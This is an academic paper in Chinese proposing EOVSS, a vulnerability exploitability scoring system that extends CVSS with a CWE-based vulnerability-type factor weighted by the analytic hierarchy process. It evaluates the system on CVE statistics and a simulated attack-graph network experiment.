基于漏洞類型的漏洞可利用性量化評(píng)估系統(tǒng)

雷柯楠 張玉清 吳晨思 馬 華

1(綜合業(yè)務(wù)網(wǎng)理論及關(guān)鍵技術(shù)國(guó)家重點(diǎn)實(shí)驗(yàn)室(西安電子科技大學(xué)) 西安 710071) 2(國(guó)家計(jì)算機(jī)網(wǎng)絡(luò)入侵防范中心(中國(guó)科學(xué)院大學(xué)) 北京 101408) 3(西安電子科技大學(xué)數(shù)學(xué)與統(tǒng)計(jì)學(xué)院 西安 710071) (leikn@nipc．org．cn)

2017-06-11；

2017-08-03

國(guó)家自然科學(xué)基金項(xiàng)目(61572460,61272481)；國(guó)家重點(diǎn)研發(fā)計(jì)劃項(xiàng)目(2016YFB0800700)；信息安全國(guó)家重點(diǎn)實(shí)驗(yàn)室的開放課題(2017-ZD-01)；國(guó)家發(fā)改委信息安全專項(xiàng)項(xiàng)目[(2012)1424]；國(guó)家111項(xiàng)目(B16037) This work was supported by the National Natural Science Foundation of China (61572460, 61272481), the National Key Research and Development Program of China (2016YFB0800700), the Open Project Program of the State Key Laboratory of Information Security (2017-ZD-01), the National Information Security Special Projects of National Development and Reform Commission of China [(2012)1424], and the China 111 Project (B16037).

張玉清(zhangyq@nipc.org.cn)

基于漏洞類型的漏洞可利用性量化評(píng)估系統(tǒng)

雷柯楠1,2張玉清1,2吳晨思2馬 華3

1(綜合業(yè)務(wù)網(wǎng)理論及關(guān)鍵技術(shù)國(guó)家重點(diǎn)實(shí)驗(yàn)室(西安電子科技大學(xué)) 西安 710071)2(國(guó)家計(jì)算機(jī)網(wǎng)絡(luò)入侵防范中心(中國(guó)科學(xué)院大學(xué)) 北京 101408)3(西安電子科技大學(xué)數(shù)學(xué)與統(tǒng)計(jì)學(xué)院 西安 710071) (leikn@nipc．org．cn)

準(zhǔn)確量化單個(gè)漏洞可利用性是解決基于攻擊路徑分析網(wǎng)絡(luò)安全態(tài)勢(shì)的基礎(chǔ)和關(guān)鍵，目前運(yùn)用最廣泛的漏洞可利用性評(píng)估系統(tǒng)是通用漏洞評(píng)分系統(tǒng)(common vulnerability scoring system, CVSS).首先利用CVSS對(duì)54 331個(gè)漏洞的可利用性進(jìn)行評(píng)分，將結(jié)果進(jìn)行統(tǒng)計(jì)分析發(fā)現(xiàn)CVSS評(píng)分系統(tǒng)存在著評(píng)分結(jié)果多樣性不足，分?jǐn)?shù)過(guò)于集中等問(wèn)題.鑒于CVSS的不足，進(jìn)一步對(duì)漏洞可利用性影響要素進(jìn)行研究，研究發(fā)現(xiàn)漏洞類型能影響可利用性大小.因此將漏洞類型作為評(píng)估漏洞可利用性的要素之一，采用層次分析法將其進(jìn)行量化，基于CVSS上提出一種更為全面的漏洞可利用性量化評(píng)估系統(tǒng)(exploitability of vulnerability scoring systems, EOVSS).實(shí)驗(yàn)證明：EOVSS具有良好的多樣性，并能更準(zhǔn)確有效地量化評(píng)估單個(gè)漏洞的可利用性.

漏洞；可利用性；漏洞類型；層次分析法；量化

隨著計(jì)算機(jī)網(wǎng)絡(luò)的發(fā)展，網(wǎng)絡(luò)上攻擊的發(fā)生頻率越來(lái)越高，攻擊技術(shù)也日趨增強(qiáng).攻擊者會(huì)利用一些漏洞之間的相互關(guān)聯(lián)來(lái)進(jìn)行攻擊，這樣不僅能增加攻擊隱蔽性，還能提高攻擊成功概率.例如APT攻擊，它具有極強(qiáng)的隱蔽能力，使得防火墻、入侵檢測(cè)系統(tǒng)等傳統(tǒng)的安全防護(hù)手段束手無(wú)策[1].網(wǎng)絡(luò)信息系統(tǒng)的安全日趨嚴(yán)重，如何度量網(wǎng)絡(luò)安全形勢(shì)是亟待解決的問(wèn)題之一[2].利用基于攻擊路徑的度量機(jī)制能有效地對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行安全態(tài)勢(shì)評(píng)估，分析漏洞之間的關(guān)聯(lián)，為網(wǎng)絡(luò)管理者提供一些安全建議，而基于攻擊路徑的安全態(tài)勢(shì)評(píng)估方法依賴于每一個(gè)漏洞的可利用性大小，單個(gè)漏洞可利用的大小是解決基于攻擊路徑分析網(wǎng)絡(luò)安全態(tài)勢(shì)評(píng)估的重要數(shù)據(jù)依據(jù)，因此，準(zhǔn)確量化單個(gè)漏洞可利用性就顯得尤為關(guān)鍵和重要.

漏洞可利用性是指該漏洞被攻擊者攻擊和利用可能性大小，是漏洞的固有屬性[3].它作為評(píng)估漏洞嚴(yán)重性的一部分，兩者是從屬關(guān)系，漏洞可利用性越高，說(shuō)明漏洞嚴(yán)重程度越高，但是漏洞嚴(yán)重程度越高并不能代表可利用性越高.由于影響漏洞可利用性的因素有很多，而且這些因素大多數(shù)具有不確定性、復(fù)雜性[4]，如何從這些因素中提取關(guān)鍵信息并對(duì)其進(jìn)行量化在網(wǎng)絡(luò)安全態(tài)勢(shì)分析中具有重要意義.

本文在通用漏洞評(píng)分系統(tǒng)(common vulnerability scoring system, CVSS)的基礎(chǔ)上，對(duì)漏洞庫(kù)中的大量漏洞進(jìn)行統(tǒng)計(jì)分析后，建立了一個(gè)更為全面的漏洞可利用性評(píng)估系統(tǒng)(exploitability of vulnerability scoring system, EOVSS)，通過(guò)實(shí)驗(yàn)證明，EOVSS相比于CVSS，能將相同分值漏洞進(jìn)一步劃分，使可利用性分值多樣化，并使評(píng)估更加準(zhǔn)確.本文的主要貢獻(xiàn)有3個(gè)方面：

1) 利用CVSS對(duì)公共漏洞和暴露(common vulnerabilities and exposures, CVE)漏洞庫(kù)中54 331個(gè)漏洞的可利用性進(jìn)行評(píng)分，對(duì)結(jié)果進(jìn)行統(tǒng)計(jì)，數(shù)據(jù)表明:CVSS評(píng)分具有多樣性不足、分值過(guò)于集中等問(wèn)題.

2) 分析了影響漏洞可利用性的要素，發(fā)現(xiàn)漏洞類型可以影響可利用性的大小，并利用層次分析法將其量化.

3) 引入漏洞類型作為一個(gè)新的可利用性評(píng)估要素，提出EOVSS，實(shí)驗(yàn)結(jié)果表明EOVSS具有更好的多樣性和準(zhǔn)確性.

1 相關(guān)工作

目前，多數(shù)研究主要集中于2方面：

1) 利用攻擊路徑來(lái)模擬網(wǎng)絡(luò)實(shí)際安全狀態(tài)并進(jìn)行量化分析，最終得到網(wǎng)絡(luò)的總體安全態(tài)勢(shì)值.這些研究對(duì)如何建立網(wǎng)絡(luò)攻擊路徑及分析漏洞之間的相互依賴關(guān)系進(jìn)行了探討[5]，卻忽略了對(duì)單個(gè)漏洞可利用性量化這個(gè)基礎(chǔ)問(wèn)題.有的沒(méi)有說(shuō)明應(yīng)該如何得到漏洞可利用性大小，僅靠單純地觀測(cè)漏洞并給出一個(gè)量化值；有的依靠CVSS來(lái)獲取漏洞可利用性量化值.

有研究中提出對(duì)多階段網(wǎng)絡(luò)攻擊的形式化描述，在此基礎(chǔ)上建立了攻擊鏈和攻擊樹并基于攻擊樹對(duì)攻擊者到達(dá)安全目標(biāo)的可能性進(jìn)行量化分析[6]，其中，各個(gè)漏洞的可利用性大小決定了攻擊者達(dá)到安全目標(biāo)的可能性大小.2007年Lai等人提出了3種漏洞分析的方法[7]，方法之一就是利用攻擊路徑來(lái)分析網(wǎng)絡(luò)上主機(jī)的安全風(fēng)險(xiǎn)值，而要獲得網(wǎng)絡(luò)上主機(jī)的安全值就必須先獲得攻擊路徑上各漏洞的可利用值.但上述2篇文獻(xiàn)均沒(méi)有給出如何獲得漏洞的可利用量化值.2014年Zhang等人在獲取漏洞可利用性量化值時(shí)，在CVSS基礎(chǔ)上增加了影響可利用性的相關(guān)指標(biāo)[8]，但研究沒(méi)有給出該指標(biāo)為何會(huì)影響可利用性，并不具有說(shuō)服性.還有研究者提出了利用貝葉斯網(wǎng)絡(luò)的攻擊圖量化分析網(wǎng)絡(luò)總體安全性[9].考慮到漏洞間的關(guān)聯(lián)性和依賴性，把貝葉斯網(wǎng)絡(luò)用于攻擊圖的安全分析，得到的分析結(jié)果比較符合網(wǎng)絡(luò)攻擊的實(shí)際情況.但對(duì)于攻擊圖中的每個(gè)節(jié)點(diǎn)的條件概率即漏洞的可利用性大小，僅從CVSS中獲取該值，并且加入了嚴(yán)重性的影響，這并不能滿足需求.國(guó)內(nèi)研究者陸余良等人提出了一種針對(duì)主機(jī)安全性的量化融合模型[10].該模型基于規(guī)范的網(wǎng)絡(luò)綜合信息數(shù)據(jù)庫(kù)，利用相關(guān)數(shù)學(xué)模型對(duì)漏洞進(jìn)行可利用性分析，在此基礎(chǔ)上對(duì)目標(biāo)主機(jī)的安全性能進(jìn)一步評(píng)估.該研究給出了漏洞可利用性的評(píng)估指標(biāo)，但僅從主觀角度分析，沒(méi)有數(shù)據(jù)依據(jù).

2) 對(duì)單個(gè)漏洞的嚴(yán)重性進(jìn)行分析.20世紀(jì)末至21世紀(jì)初，定性評(píng)估漏洞等級(jí)方法迅速流行起來(lái)，IBM,Microsoft,Secunia,Symantec等大多數(shù)廠商各自從不同的角度對(duì)產(chǎn)品漏洞進(jìn)行定性評(píng)估，但由于各自方法不一，出現(xiàn)了評(píng)定混亂的現(xiàn)象，而且定量評(píng)分方式停滯不前.2004年CVSS在這一背景下產(chǎn)生，建立起一套對(duì)漏洞嚴(yán)重性進(jìn)行定量評(píng)分的方法，試圖打破各個(gè)廠商評(píng)估不一的局面，美國(guó)國(guó)家漏洞數(shù)據(jù)庫(kù)將CVSS作為其官方漏洞威脅評(píng)估的方法.近年來(lái)，不少安全人員對(duì)CVSS進(jìn)行了改進(jìn)，在CVSS的基礎(chǔ)上，通過(guò)不同的方式去優(yōu)化它.

2015年Wen等人分析了CVSS在指標(biāo)取值、危害值分布、分散性和客觀性方面所存在的問(wèn)題[11],提出了CVSS_PCA危害性評(píng)估系統(tǒng)，但對(duì)漏洞可利用性部分沒(méi)有加以討論；研究者在同年分析了ExpertSystem和CVSS的客觀性，并基于Expert-System對(duì)CVSS進(jìn)行了修正，文中對(duì)漏洞可利用性做了部分探討[12]，但沒(méi)有加入新的要素；Liu等人利用層次分析法量化了漏洞嚴(yán)重性相關(guān)要素，設(shè)計(jì)了一套新的評(píng)估系統(tǒng)[13]，但對(duì)可利用性相關(guān)要素沒(méi)有進(jìn)行探討；Wang等人在研究中增加了影響漏洞嚴(yán)重性的相關(guān)指標(biāo)[14]，但主觀性較強(qiáng)，沒(méi)有數(shù)據(jù)依據(jù)，不具有良好的說(shuō)服性；王凱等人對(duì)如何有效挖掘安卓系統(tǒng)漏洞進(jìn)行了總結(jié)分析，并討論了值得進(jìn)一步研究的安全問(wèn)題[15]，但主要講的是如何發(fā)現(xiàn)漏洞，對(duì)漏洞進(jìn)行安全性評(píng)估在文章中篇幅較少，并且主要針對(duì)的是安卓漏洞；還有研究者提出了一種新的評(píng)估模式VRSS[16]，主要是采用定性和定量相結(jié)合的方式去評(píng)估，有效地融合了定性評(píng)估和定量評(píng)估的優(yōu)點(diǎn)，但該文獻(xiàn)沒(méi)有加入新的要素，僅將漏洞可利用性作為評(píng)估漏洞嚴(yán)重性的一小部分，沒(méi)有針對(duì)漏洞可利用性進(jìn)行詳細(xì)分析；評(píng)估系統(tǒng)WIVSS[17]是基于CVSS基礎(chǔ)上的一種漏洞評(píng)估系統(tǒng)，文中首先介紹了CVSS背景及使用方法，并對(duì)CVSS做進(jìn)一步改進(jìn)，所采用的方式是將影響要素單項(xiàng)分值進(jìn)行重新判定，將2個(gè)具有相同分值的要素進(jìn)行進(jìn)一步區(qū)分，增加了評(píng)估結(jié)果的多樣性.但由于優(yōu)化時(shí)沒(méi)有進(jìn)行大量數(shù)據(jù)的分析，從而數(shù)據(jù)依據(jù)不足，僅從人為角度判斷，主觀性較強(qiáng).在本文第5節(jié)中也進(jìn)一步做了實(shí)驗(yàn)對(duì)比分析.

2 CVSS介紹及分析

CVSS作為目前最為廣泛使用的定量評(píng)估系統(tǒng)，相比于定性評(píng)估，能更客觀地評(píng)估漏洞的嚴(yán)重程度，幫助安全人員確定所需反應(yīng)的緊急度和重要度[18].CVSS基本群描述了影響漏洞嚴(yán)重性的6個(gè)固有要素，分別為訪問(wèn)復(fù)雜度、攻擊向量、身份認(rèn)證、可用性影響、完整性影響和機(jī)密性影響，這些要素在漏洞評(píng)估中起著重要作用[19].其中，訪問(wèn)復(fù)雜度、攻擊向量、身份認(rèn)證被用來(lái)衡量漏洞可利用性大小.本文主要針對(duì)這3個(gè)要素進(jìn)行研究.

2.1可利用性三要素

1) 訪問(wèn)復(fù)雜度賦值包括：高、中、低.

① 高.進(jìn)行目標(biāo)訪問(wèn)時(shí)存在特定的訪問(wèn)條件.示例：Linux kernel拒絕服務(wù)漏洞(CVE-2014-3940).

② 中.進(jìn)行目標(biāo)訪問(wèn)時(shí)存在一定的訪問(wèn)條件.示例：多款Oracle組件安全漏洞(CVE-2015-0383).

③ 低.進(jìn)行目標(biāo)訪問(wèn)時(shí)沒(méi)有訪問(wèn)限制.示例：Apple TV輸入驗(yàn)證漏洞(CVE-2014-1271).

2) 攻擊向量賦值包括本地、近鄰、遠(yuǎn)程.

① 本地.攻擊者利用該安全漏洞時(shí)，需要物理接觸攻擊的系統(tǒng)，或者已具有一個(gè)本地賬號(hào).示例：CUCSM組件輸入驗(yàn)證漏洞(CVE-2012-4093).

② 近鄰.攻擊者利用該漏洞時(shí)，需要和受攻擊的系統(tǒng)處于一個(gè)廣播或沖突域中.示例：SEP授權(quán)問(wèn)題漏洞(CVE-2013-5009).

③ 遠(yuǎn)程.攻擊者利用該漏洞進(jìn)行攻擊時(shí)，不需要獲取內(nèi)網(wǎng)訪問(wèn)權(quán)或本地訪問(wèn)權(quán).示例：ASUS RT-AC66U多個(gè)緩沖區(qū)溢出漏洞(CVE-2013-4659).

3) 身份認(rèn)證賦值包括多次、一次、不需要.

① 多次.漏洞利用需要多次身份認(rèn)證.示例：Oracle MySQL Server 拒絕服務(wù)漏洞(CVE-2014-0430).

② 一次.漏洞利用需要一次身份認(rèn)證.示例：PostgreSQL 基于棧的緩沖區(qū)溢出漏洞(CVE-2014-0063).

③ 不需要.漏洞利用無(wú)需身份認(rèn)證.示例：Apple TV輸入驗(yàn)證漏洞(CVE-2014-1271).

2.2可利用性分值多樣性及分布

為了客觀準(zhǔn)確地分析利用CVSS對(duì)漏洞可利用性的評(píng)估情況，本文作者獲取了CVE漏洞庫(kù)中2007—2016年公布的54 331個(gè)漏洞[20]，對(duì)每一個(gè)漏洞的可利用性三要素進(jìn)行提取，并利用CVSS給出的評(píng)估方法計(jì)算每一個(gè)漏洞的可利用性分值.以下列出了CVSS在評(píng)估漏洞可利用性時(shí)每一種可能情況的度量標(biāo)準(zhǔn)及可利用性計(jì)算公式，如表1所示：

Table 1 Possible Values for Exploitability Metrics

Fig. 1 Distribution of CVSS exploitability scores圖1 CVSS漏洞可利用性分值直方圖

1) 多樣性分析

漏洞評(píng)估系統(tǒng)的核心思想是將大量漏洞進(jìn)行盡可能多的分類，便于使用者能快速區(qū)分漏洞，給安全人員提供漏洞修補(bǔ)順序建議.當(dāng)數(shù)據(jù)集非常大時(shí)，多樣化的分值能對(duì)其進(jìn)行更好的區(qū)分.我們對(duì)CVE漏洞庫(kù)的54 331個(gè)漏洞可利用性分值進(jìn)行了統(tǒng)計(jì),如圖1所示:

根據(jù)表1，CVSS漏洞可利用性分值理論上應(yīng)有27種，在1.2～10分之間，分值越高，表示該漏洞本身的固有利用性越高.根據(jù)統(tǒng)計(jì)結(jié)果圖1顯示，CVE漏洞庫(kù)數(shù)據(jù)集中，存在的可利用性分值共有23種，最低為1.2分，最高為10分.

2) 數(shù)據(jù)分布分析

數(shù)據(jù)集分布情況可以直觀、快速地觀察數(shù)據(jù)的分散程度和中心趨勢(shì).根據(jù)統(tǒng)計(jì)結(jié)果，利用CVSS評(píng)估的5萬(wàn)多個(gè)漏洞中，有4個(gè)可利用分值的樣本數(shù)少于10，分別為1.2,2.0,3.5,4.1.8個(gè)漏洞可利分值的樣本數(shù)大于1 000，分別是3.4,3.9,4.9,5.5,6.8,8.0,8.6,10，其中8.6,10最為居多，樣本數(shù)均在2萬(wàn)左右，如圖2所示，8.6及10所占比例較大，達(dá)的74%.

Fig. 2 Pie chart of CVSS exploitability scores圖2 CVSS漏洞可利用性分值扇形圖

從上述統(tǒng)計(jì)我們發(fā)現(xiàn)，CVSS漏洞可利用性評(píng)分多樣性不足，并且分值過(guò)于集中，可利用性高的漏洞數(shù)量非常大，如何將這些漏洞進(jìn)行進(jìn)一步劃分，在網(wǎng)絡(luò)安全態(tài)勢(shì)分析中具有重要意義.

3 漏洞類型研究

3.1個(gè)案分析

面對(duì)多個(gè)具有相同可利用分值的漏洞時(shí)，哪一個(gè)會(huì)更先被攻擊者利用？為了進(jìn)一步研究漏洞可利用性相關(guān)要素，我們對(duì)多個(gè)具有相同可利用分值的漏洞進(jìn)行了分析，下面是2個(gè)實(shí)例.

1) CVE-2016-1247.Ubuntu發(fā)行版的Nginx在新建日志目錄的時(shí)，使用了不安全的權(quán)限，攻擊者可以從nginx/web用戶權(quán)限提升到ROOT.

2) CVE-2014-3085.使用1.20.20.23447之前版本固件的IBM 1754 GCM16和GCM32 GCM交換機(jī)的systest.php腳本中存在安全漏洞，攻擊者可通過(guò)“l(fā)pres” 參數(shù)中的shell元字符利用該漏洞執(zhí)行任意命令.

上述2個(gè)漏洞在CVSS中可利用性評(píng)分都為3.9，然而，研究表明在實(shí)際情況中，后者能被成功利用的概率約為35.6%，前者約為31.3%，因此后者比前者更容易達(dá)到攻擊目的.通過(guò)對(duì)比分析發(fā)現(xiàn)，兩者屬于不同的漏洞類型，前者屬于CWE-59(link following)，后者屬于CWE-78(os command injec-tions).鑒于此，我們提出疑問(wèn)，漏洞類型是否會(huì)影響漏洞可利用性，并在3.2節(jié)中給出分析結(jié)果.

3.2漏洞類型與可利用性關(guān)系

本文采用了美國(guó)國(guó)家漏洞數(shù)據(jù)通用缺陷列表(common weak-ness enumeration, CWE)分類機(jī)制[21]來(lái)對(duì)漏洞類型與漏洞可利用性之間的關(guān)系進(jìn)行研究.對(duì)已具分類標(biāo)準(zhǔn)的41 814個(gè)漏洞進(jìn)行統(tǒng)計(jì)，獲取到的CWE一共有69種，每個(gè)CWE代表一種漏洞類型，其中有47種CWE的樣本數(shù)少于20，由于樣本數(shù)過(guò)少會(huì)有較大誤差，并且這些漏洞數(shù)量較少，只占全部漏洞的0.3%，所以對(duì)正確率的影響較小，我們?cè)诮y(tǒng)計(jì)時(shí)對(duì)該47種CWE忽略不計(jì)，將余下22種CWE進(jìn)行統(tǒng)計(jì)，共計(jì)漏洞41 727個(gè).根據(jù)已有的分類標(biāo)準(zhǔn)[22]將漏洞可利用性的23個(gè)分值分為1.2～3.9，4～6.9，7～9.9，10這4個(gè)等級(jí)，分別代表B1不易利用、B2稍易利用、B3容易利用、B4極易利用.以下列出了漏洞類型及各類型中漏洞分布情況，如表2所示：

Table 2 Vulnerability Types and Exploitability Levels

根據(jù)表2發(fā)現(xiàn)，87.6%的CWE-59漏洞可利用分布在不易利用等級(jí)中，82.2%的CWE-89分值在極易利用等級(jí)中，這說(shuō)明:CWE-89類型漏洞相較于CWE-59，更容易被攻擊者利用，漏洞類型對(duì)可利用性具有一定的影響.

為了增加漏洞可利用性評(píng)分結(jié)果的多樣性，更全面地評(píng)估漏洞可利用性，需要增加相關(guān)指標(biāo)，對(duì)現(xiàn)有的指標(biāo)細(xì)致化.對(duì)此，根據(jù)上述統(tǒng)計(jì)，建議將漏洞類型作為評(píng)估可利用性的要素，從而建立一個(gè)更加完善的漏洞可利用性評(píng)分系統(tǒng)EOVSS.

4 EOVSS的設(shè)計(jì)與實(shí)現(xiàn)

4.1EOVSS整體結(jié)構(gòu)

EOVSS是基于CVSS上，增加漏洞類型作為可利用性評(píng)估要素的評(píng)估系統(tǒng).在EOVSS中，AC,AV,AU分別從CVSS中得到，漏洞類型(vulnerability type,VT)是新增的漏洞可利用性要素.根據(jù)文獻(xiàn)[23]中的研究，利用對(duì)指標(biāo)評(píng)分來(lái)確定指標(biāo)取值，得出漏洞可利用性評(píng)價(jià)樣本矩陣，建立各灰類的中心點(diǎn)白化函數(shù)，最終得出漏洞類型的權(quán)重可知，漏洞類型在可利用性中權(quán)重為0.1.因此將VT量化評(píng)分保持在0～1.AC,AV,AU的權(quán)重為0.9，將CVSS中系數(shù)20設(shè)為18.這樣 EOVSS與CVSS評(píng)分系統(tǒng)能保持單項(xiàng)分0～1和總分0～10一致性，方便安全人員的利用.最終可利用性計(jì)算為

EOVSSscore=18×AC×AV×AU+VT.

(1)

4.2層次分析法

層次分析法(analytic hierarchy process, AHP)是一種層次權(quán)重決策分析方法，能有效處理決策問(wèn)題.AHP將決策問(wèn)題分為目標(biāo)、準(zhǔn)則、措施3個(gè)層次，每一層有若干元素，通過(guò)比較確定同層之間元素對(duì)上一級(jí)單個(gè)元素的權(quán)重，來(lái)確定各措施方案對(duì)目標(biāo)的權(quán)重.根據(jù)層次分析法中的特征向量法確定權(quán)重向量的理論中，建立判斷矩陣并由此求下層因素對(duì)上層某一因素的權(quán)重向量是一個(gè)重要環(huán)節(jié).目前，從判斷矩陣的一致性角度來(lái)確定權(quán)重向量的方法已有10幾種，特征向量法(即求判斷矩陣最大特征跟對(duì)應(yīng)的特征向量作為權(quán)重向量)就是其中在算法上比較成熟和穩(wěn)定的一種.本文即采用特征向量法來(lái)確定權(quán)重.

主要步驟如下：

1) 建立遞階層次結(jié)構(gòu).

2) 構(gòu)造兩兩比較判別矩陣.對(duì)各指標(biāo)之間進(jìn)行兩兩對(duì)比，即每次取2個(gè)因子xi和xj，以ai j表示xi和xj對(duì)Z的影響大小之比.對(duì)于如何確定ai j的值，Saaty等人給出了引用數(shù)字作為標(biāo)度，按9分位比例排定各評(píng)價(jià)指標(biāo)的相對(duì)優(yōu)劣順序，依次構(gòu)造出評(píng)價(jià)指標(biāo)的判斷矩陣A.

3) 一致性檢驗(yàn).當(dāng)判斷矩陣的階數(shù)時(shí)，通常難以構(gòu)造出滿足一致性的矩陣來(lái),但判斷矩陣偏離一致性條件又應(yīng)有一個(gè)度，因此，必須對(duì)判斷矩陣是否可接受進(jìn)行鑒別，鑒別步驟如下.

① 計(jì)算一致性指標(biāo)CI:

(2)

② 查找文獻(xiàn)[24]相應(yīng)的平均隨機(jī)一致性指標(biāo)RI;

③ 計(jì)算一致性比例CR：

CR=CIRI,

(3)

當(dāng)CR<0.10時(shí)，認(rèn)為判斷矩陣的一致性是可以接受的，否則應(yīng)對(duì)判斷矩陣作適當(dāng)修正.

4.3基于AHP的VT量化

漏洞類型對(duì)可利用性的影響可以被看作是一個(gè)決策問(wèn)題，所以我們采用AHP來(lái)量化VT.

根據(jù)AHP的計(jì)算過(guò)程，第1步構(gòu)造以漏洞類型劃分的AHP模型，確定了目標(biāo)層、準(zhǔn)則層和決策層，如圖3所示.目標(biāo)層為漏洞可利用性，從上文分析已知，CVSS的分值有23種且分部非常集中，因此在保證準(zhǔn)確率的前提下，為了簡(jiǎn)化計(jì)算方便使用，可將22×23階矩陣簡(jiǎn)化22×4階矩陣.將4個(gè)準(zhǔn)則群組標(biāo)記為B1：不易利用；B2：稍易利用；B3：容易利用；B4：極易利用，22個(gè)漏洞類型的決策層標(biāo)記為Id1～I(xiàn)d22.

Fig. 3 Vulnerability type factors hierarchy model圖3 漏洞類型層次化模型

第2步構(gòu)造準(zhǔn)則層對(duì)目標(biāo)層的判斷矩陣如下：

B1B2B3B4B111∕31∕51∕9B2311∕31∕6B35311∕4B49641

計(jì)算矩陣最大特征向量為

(0.0447 0.1031 0.1153 0.6240)T

進(jìn)行一致性檢驗(yàn)，得CR=0.046<0.1，判斷矩陣一致性可接受.

第3步構(gòu)造決策層元素對(duì)準(zhǔn)則層的判斷矩陣.決策層為22種漏洞類型，構(gòu)造漏洞類型對(duì)不易利用B1影響的22階判斷矩陣，如表3所示.利用Matlab計(jì)算出最大特征向量為

( 0.055 9 0.055 9 0.020 3 0.034 0 0.012 8 0.220 9

0.034 0 0.012 8 0.012 8 0.012 8 0.020 3 0.034 0

0.034 0 0.055 9 0.034 0 0.083 1 0.034 0 0.020 3

0.020 3 0.012 8 0.145 1 0.034 0)T.

由一致性檢測(cè)可得CR=0.014<0.1，一致性可接受.通過(guò)同樣的方法，構(gòu)造漏洞類型對(duì)稍易利用B2、容易利用B3、極易利用B4的判斷矩陣，分別計(jì)算最大特征向量及進(jìn)行一致性檢測(cè)，判斷結(jié)果都可接受.上述2步分別是第2層各元素對(duì)第1層相對(duì)重要性的排序權(quán)值，及第3層各個(gè)元素對(duì)第2層單個(gè)因素相對(duì)重要性的排序權(quán)值.最后，為了得到漏洞類型對(duì)可利用性影響量化結(jié)果，還需計(jì)算措施層對(duì)目標(biāo)層的總排序結(jié)果，這可以由上一層次總排序的權(quán)重值與本層次的單排序權(quán)重復(fù)而成，如表4所示，對(duì)于上述0.3%被剔除的漏洞，為了減小誤差，使數(shù)據(jù)更完善以及更具客觀性，針對(duì)以上被剔除的漏洞，其VT為整體VT的平均值，

(4)

Table 3 The Pairwise Comparison Matrix of Alternatives

Table 4 Summary of AHP Preferences

5 實(shí)驗(yàn)及分析

5.1EOVSS多樣性及分布

Fig. 4 Distribution of EOVSS exploitability scores圖4 EOVSS漏洞可利用性分值分布圖

為了和CVSS評(píng)分進(jìn)行對(duì)比，我們將第2節(jié)54 331個(gè)漏洞利用EOVSS進(jìn)行評(píng)分并統(tǒng)計(jì).

1) 多樣性分析

最終統(tǒng)計(jì)結(jié)果如圖4所示，EOVSS漏洞可利用性分值共計(jì)66種，分值在1.4～10分之間，分值越高，表示該漏洞本身的固有利用率越高.相較于CVSS的23種分值(如圖1所示)，EOVSS將一部分CVSS分值相同的漏洞進(jìn)行了進(jìn)一步的劃分，具有更多樣化的評(píng)分結(jié)果，可供安全人員更好地評(píng)估漏洞可利用性.

2) 數(shù)據(jù)分布分析

漏洞分布扇形圖如圖5所示:

Fig. 5 Distribution of EOVSS exploitability scores圖5 EOVSS漏洞可利用性分值扇形圖

從圖5我們可以看出，EOVSS可利用性分值分布更為廣泛，不過(guò)還是有集中個(gè)數(shù)較大的，例如：8分有6 142個(gè)樣本數(shù)、8.2分有5 292個(gè)樣本數(shù)、9.1分有5 336個(gè)樣本數(shù)，但是相比于CVSS存在2萬(wàn)樣本集在同一分值(如圖2所示)，EOVSS已大幅度優(yōu)化.多樣性的分值有利于安全人員對(duì)漏洞可利用性的評(píng)判，進(jìn)一步區(qū)分漏洞可利用性相近的漏洞.

5.2基于攻擊圖的EOVSS準(zhǔn)確率

根據(jù)文獻(xiàn)[25]中基于攻擊路徑評(píng)估網(wǎng)絡(luò)安全態(tài)勢(shì)，生成漏洞關(guān)系利用圖，并根據(jù)漏洞間關(guān)系獲取全局漏洞列表，評(píng)估網(wǎng)絡(luò)安全態(tài)勢(shì).為了進(jìn)行對(duì)比分析，漏洞可利用性量化值通過(guò)文獻(xiàn)[17]中量化方法WIVSS,CVSS,EOVSS這3種評(píng)估方式得到.

5.2.1 實(shí)驗(yàn)環(huán)境

本文搭建網(wǎng)絡(luò)環(huán)境如圖6所示，網(wǎng)絡(luò)環(huán)境中存在5臺(tái)主機(jī)、2層防火墻以及2個(gè)路由器，實(shí)驗(yàn)假設(shè)路由器和防火墻2種設(shè)備不存在漏洞.各節(jié)點(diǎn)信息及存在漏洞如表5所示.

Fig. 6 The network environment圖6 實(shí)驗(yàn)網(wǎng)絡(luò)環(huán)境

內(nèi)網(wǎng)部分有Web服務(wù)器，運(yùn)行互聯(lián)網(wǎng)信息服務(wù)(Internet information services, IIS)服務(wù)；SMTP服務(wù)器，運(yùn)行Sendmail服務(wù)；FTP服務(wù)器，為外網(wǎng)提供Serv-U服務(wù)；普通用戶User，為了與外網(wǎng)進(jìn)行通信，運(yùn)行遠(yuǎn)程過(guò)程調(diào)用協(xié)議(remote produce call protocol, RPCP)服務(wù)，并且可以訪問(wèn)Web服務(wù)器以及FTP服務(wù)器.其中，Web服務(wù)器、FTP服務(wù)器、SMTP服務(wù)器為L(zhǎng)inux系統(tǒng)，User主機(jī)為Windows系統(tǒng).外網(wǎng)部分為攻擊者所在網(wǎng)絡(luò)，可以與內(nèi)網(wǎng)進(jìn)行通信，若攻擊者想要成功獲取STMP服務(wù)器上某用戶的郵件信息，首先需要獲取到SMTP服務(wù)器管理員權(quán)限.防火墻對(duì)網(wǎng)絡(luò)行為進(jìn)行了限制，外網(wǎng)可與FTP、Web服務(wù)器及User進(jìn)行連接，SMTP服務(wù)器僅能通過(guò)Web服務(wù)器進(jìn)行連接.

5.2.2 實(shí)驗(yàn)過(guò)程及結(jié)果分析

根據(jù)文獻(xiàn)[25]生成方法生成實(shí)驗(yàn)環(huán)境漏洞關(guān)系利用圖，并得出實(shí)驗(yàn)環(huán)境中共存在5條攻擊路徑(如圖7所示)，分別為：

R1：Attacker-E-A-G-Target；

R2：Attacker-E-B-G-Target；

R3：Attacker-F-C-B-G-Target；

R4：Attacker-D-C-B-G-Target；

R5：Attacker-B-G-Target.

Fig. 7 The relationship of vulnerability圖7 漏洞關(guān)系圖

利用文獻(xiàn)[26]給出的公式計(jì)算漏洞被成功利用概率P=E×S，S代表漏洞間選擇性量化值，該文獻(xiàn)中已給出計(jì)算方法.E為漏洞可利用概率，CVSS在定義量化分值時(shí)，漏洞可利用性得分與漏洞可利用概率為線性關(guān)系，即分值為10即固有可利用概率為1，分值為5分即可利用概率為0.5.因此，漏洞固有可利用概率可分別從WIVSS,CVSS,EOVSS這3種方式得到.最終所得結(jié)果如表6所示.

